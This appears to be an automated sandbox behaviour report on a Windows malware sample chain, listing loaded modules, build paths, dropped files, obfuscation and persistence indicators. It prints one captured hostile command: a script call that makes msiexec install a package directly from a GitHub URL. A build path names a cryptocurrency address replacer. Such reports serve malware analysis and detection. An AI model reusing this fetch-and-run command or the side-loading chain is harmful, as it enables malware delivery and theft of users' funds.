                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80loc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: http_dll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80eng.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80eng.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80loc.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: userenv.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: propsys.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: dwmapi.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: cryptbase.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: oleacc.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: ntmarta.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: version.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: shfolder.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: wldp.dll
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: http_dll.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80eng.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80eng.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80loc.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msftedit.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: comsvcs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmlua.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: http_dll.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80eng.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80eng.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: mfc80loc.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: RaftelibeGasrss.lnk.7.dr | LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Windows\SysWOW64\msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
                      Source: Binary string: C:\Users\root\Desktop\clipmain\CryptoAddressReplacer\Release\CryptoAddressReplacer.pdb source: Updwork.exe, 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Updwork.exe, 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: msvcr80.i386.pdb source: msvcr80.dll.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb@@P5@ source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdbd1J source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: wntdll.pdbUGP source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: MFC80U.i386.pdb source: EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.dr
                      Source: Binary string: wntdll.pdb source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdb source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr

                      Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("msiexec.exe /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.ms", "0", "false");
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401000 GetCommandLineW,GetCommandLineW,wcsstr,wcsstr,GetCommandLineW,wcsstr,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetCommandLineW,wcsstr,FreeLibrary,FreeLibrary, 6_2_00401000
Source: dsx.30.dr | Static PE information: real checksum: 0x0 should be: 0x84c79
Source: Updwork.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x8a18a
Source: yljutqdulam.16.dr | Static PE information: real checksum: 0x0 should be: 0x84c79
Source: http_dll.dll.3.dr | Static PE information: real checksum: 0xe0ba0 should be: 0xe21bb
Source: zlib1.dll.7.dr | Static PE information: real checksum: 0x29cf3 should be: 0x5c414
Source: zlib1.dll.7.dr | Static PE information: section name: .eh_fram
Source: yljutqdulam.16.dr | Static PE information: section name: umlwqq
Source: dsx.30.dr | Static PE information: section name: umlwqq
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_004021B1 push ecx; ret 6_2_004021C4
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2047906D push ecx; ret 6_2_20479080
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_2043DD30 push ecx; mov dword ptr [esp], 00000080h 6_2_2043DD31
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E972DE push cs; iretd 7_2_62E972B2
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E9D751 push ebx; ret 7_2_62E9D752
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E9A8B3 push es; iretd 7_2_62E9A9B4
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E9748E push ebx; ret 7_2_62E9748F
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E971DC push cs; iretd 7_2_62E972B2
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_004021B1 push ecx; ret 15_2_004021C4
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_2047906D push ecx; ret 15_2_20479080
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_2043DD30 push ecx; mov dword ptr [esp], 00000080h 15_2_2043DD31
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C5A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\msvcr80.dll
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File created: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C7A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3BAC.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C2A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\Updwork.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\mfc80u.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\yljutqdulam
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\http_dll.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\dsx
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C5A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C7A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3BAC.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3C2A.tmp
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\yljutqdulam
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\dsx
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RaftelibeGasrss\RaftelibeGasrss.lnk
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401550 StartServiceCtrlDispatcherW, 6_2_00401550

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YLJUTQDULAM
Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DSX
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Process information set: NOOPENFILEERRORBOX
